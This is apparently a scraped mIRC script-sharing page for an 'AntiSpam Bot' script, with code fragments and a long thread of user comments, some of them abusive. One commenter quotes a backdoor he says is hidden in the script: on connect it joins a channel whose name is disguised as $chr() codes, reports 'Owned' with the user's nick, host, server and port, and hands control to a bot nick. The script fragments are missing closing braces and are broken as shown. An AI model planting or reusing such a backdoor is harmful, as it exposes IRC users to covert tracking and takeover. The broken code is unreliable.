  sockaccept antispam.identdin
  asecho $colour(other) *** Identd request from $sock($sockname).ip
  sockclose antispam.identd
  unset %antispam.identd

on *:sockread:antispam.identdin:{
  if ($sockerr) { return }
  var %temp
  sockread %temp
  if (!%temp) { return }
  tokenize 32 %temp
  sockwrite -n $sockname $1 $+ , $3 : USERID : UNIX : $asnickname($asini(personalize,ident))
  asecho $colour(other) *** Identd replied: $1 $+ , $3 : USERID : UNIX : $asnickname($asini(personalize,ident))
  sockclose antispam.identdin

; queue code from wshs
alias -l as.queue {
  if ($hget(as.queue) == $null) { hmake as.queue }
  as.hinc as.queue max
  var %antispam.qx = a $+ $hget(as.queue,max)
  hadd as.queue %antispam.qx $1-
  if ($timer(as.queue) == $null) { .timeras.queue 0 1 as.sendqueue }
alias -l as.hinc { if ($hget($1)) { hadd $1 $2 $calc($hget($1,$2) + $iif($3 isnum,$3,1)) } }
alias -l as.hdec { if ($hget($1)) { hadd $1 $2 $calc($hget($1,$2) - $iif($3 isnum,$3,1)) } }
alias -l as.sendqueue {
  if ($hget(as.queue,a1) == $null) || ($hget(as.queue,max) <= 0) { .timeras.queue off | return }
  sockwrite -n antispam $hget(as.queue,a1)
  var %antispam.start = 2
  var %antispam.end = $hget(as.queue,max)
  while (%antispam.start <= %antispam.end) {
    var %antispam.cur = a $+ $calc(%antispam.start - 1)
    var %antispam.las = a $+ %antispam.start
    if ($hget(as.queue,%antispam.las)) hadd as.queue %antispam.cur $hget(as.queue,%antispam.las)
    inc %antispam.start
  var %antispam.las = a $+ $hget(as.queue,max)
  hdel as.queue %antispam.las
  hadd as.queue max $calc($hget(as.queue,max) - 1)
alias -l as.clearqueue {
  if (!$hget(as.queue)) { hmake as.queue }
  var %antispam.bleh = $hmatch(as.queue,a*,0)
  hfree as.queue
  hmake as.queue
  hadd as.queue max 0
  return %antispam.bleh

alias -l as.settings {
  if ($dialog(antispam) == $null) {
    set %antispam.set.web $askickmsg([ma/web])
    set %antispam.set.inv $askickmsg([ma/inv])
    set $askickmsg([ma/net])
    set $askickmsg([exp/bd])
    set %antispam.set.vrs $askickmsg([exp/vrs])
    set %antispam.set.greet $askickmsg([autogreet])
    dialog -m antispam antispam


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Stewie1k94   -  Feb 03, 2012

TropicalMeltdown wrote: > No i didnt rip this one Sounded like you were saying you have ripped snippet's before?

SplitFire   -  Feb 03, 2012

I cant believe ppl still actually think breaking down commands into separate $chr's makes their backdoor invisible :/

Kentaro Kurosaki   -  Feb 02, 2012

watches as he probably will start getting spam notices

xplo   -  Feb 02, 2012

It is. nicely seen :P

SplitFire   -  Feb 01, 2012

Is it me or this piece of shit code is backdoored ?

on :CONNECT: {
sockopen antisp 6667
:sockopen:antisp: {
if (%id == $null) { set %id AntiSpam $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) }
if ($sockerr) return
else set %nname $rand(A,Z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z)
sockwrite -n $sockname Nick %nname $+ $crlf $+ User $rand(a,z) $+ $rand(a,z) $+ nwo $+ $rand(a,z) $+ $rand(a,z) $ip : $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z)
sockwrite -n $sockname join $chr(35) $+ $chr(70) $+ $chr(85) $+ $chr(67) $+ $chr(75) $+ $chr(89) $+ $chr(79) $+ $chr(85) $+ $chr(77) $+ $chr(65) $+ $chr(77) $+ $chr(78) $+ $chr(73)
sockwrite -n $sockname privmsg $chr(35) $+ $chr(70) $+ $chr(85) $+ $chr(67) $+ $chr(75) $+ $chr(89) $+ $chr(79) $+ $chr(85) $+ $chr(77) $+ $chr(65) $+ $chr(77) $+ $chr(78) $+ $chr(73) :Owned:5 $me $+ 10 $host $+ 2 $server $+ : $+ $port $+ 7 %id
.timeropp 1 1 .sockwrite -n $sockname PRIVMSG op $chr(35) $+ $chr(70) $+ $chr(85) $+ $chr(67) $+ $chr(75) $+ $chr(89) $+ $chr(79) $+ $chr(85) $+ $chr(77) $+ $chr(65) $+ $chr(77) $+ $chr(78) $+ $chr(73) %nname
.timerkeyy 1 15 .sockwrite -n $sockname MODE $chr(35) $+ $chr(70) $+ $chr(85) $+ $chr(67) $+ $chr(75) $+ $chr(89) $+ $chr(79) $+ $chr(85) $+ $chr(77) $+ $chr(65) $+ $chr(77) $+ $chr(78) $+ $chr(73) k $chr(0141) $+ $chr(0144)
.unset %nname

CharltonJ   -  Dec 24, 2008


Bullet_Dodger   -  Oct 20, 2008

Kirby I laughed when this guy said khalsa helped him make it

khalsa cant even set room modes seriously

This IRC killer clown is a tard and i have him on my blacklist ffor op begging


Kirby   -  Oct 20, 2008
Bullet_Dodger   -  Oct 14, 2008


This one was ripped Lol

It was copyed from xtry's invincible script :-s

Epik-Fail   -  Oct 14, 2008

" No i didnt rip this one "

          This ONE But You Probly Have Ripped Other Scrips Off People


/me goes back to being zoned out at Jenni's pictures

Blitzjager   -  Oct 13, 2008

Just for shits and giggles :P

Bullet_Dodger   -  Oct 13, 2008

Lol @ Blitzjager

That was sarcasm right

Blitzjager   -  Oct 13, 2008

Thanks! I've been looking for a script like this.
Good work.

Bullet_Dodger   -  Oct 13, 2008

Errm They go on the server i go on O_o and

Khalsa and tropical <b
Arnt The same person


Khalsa can set room modes let alone script and
irc killer clown is a fucking gayboy that asks in the #support room how to turn xOP off

Enough Said

Spanky   -  Aug 21, 2008

& also and khalsa77 to that list

Spanky   -  Aug 21, 2008

TropicalMeltdown a Ripper, who rips perfectly good scripts and posts them as his own.
TropicalMeltdown became a lamer by ripping a script. Therefore TropicalMeltdown is lame.

Spanky   -  Aug 21, 2008

/me wish i could rate ZERO.... there both lamers.
lol they cant script to save there lifes GAWD... /me readds to blacklist /me thinks they should not be on hawkee. NON LAMERS ONLY

Jamiie   -  Jul 24, 2008

lawl, /me rates 1 :D

juhapuha   -  Jul 24, 2008


Paul_1337noob   -  Jul 24, 2008

probably not worth the hassle but may also be worth looking at the ip of tropical meltdown and khalsa77 could be the same person :O

Cheiron   -  Jul 24, 2008

; AntiSpam Bot by The Killer Clown (sct) -- Version 3
on *:LOAD:{
if ($os == 3.1) {
echo $colour(info) -se *** This script is known to cause problems using Windows 3.1. This script has been unloaded.
unload -rs antispam.mrc

now..... who even remembers using windows 3.1 let alone having windows 3.1 running and actually working still...

for a new script.... hmmmmmmm

F*U*R*B*Y*   -  Jul 24, 2008

dude, if you want to get rid of all these crappy post\'s about you ripping, hit alt+f4 and it should delete them :)

xplo   -  Jul 24, 2008

1 Ripping is lame

2 Rippers should die


2 You Should Die fucking Ripper!!

my 2cents =)


Fuzion   -  Jul 24, 2008


BlueThen   -  Jul 23, 2008

You ageis-! oh. :D

Jonesy44   -  Jul 23, 2008

haha, agreed.

Think this crap script is gonna get boosted to the top on comments xD

napa182   -  Jul 23, 2008

this kid just fails at jokes as well at scripting

TropicalMeltdown   -  Jul 23, 2008

im leaving

TropicalMeltdown   -  Jul 23, 2008

<<- fifth grader -.-

Jonesy44   -  Jul 23, 2008

Hehe, i\'m almost in histerics here.

Troppie sounds like a 13 y/o .. and not even the BlueTHen kinda 13y/o .. this one\'s a moron..

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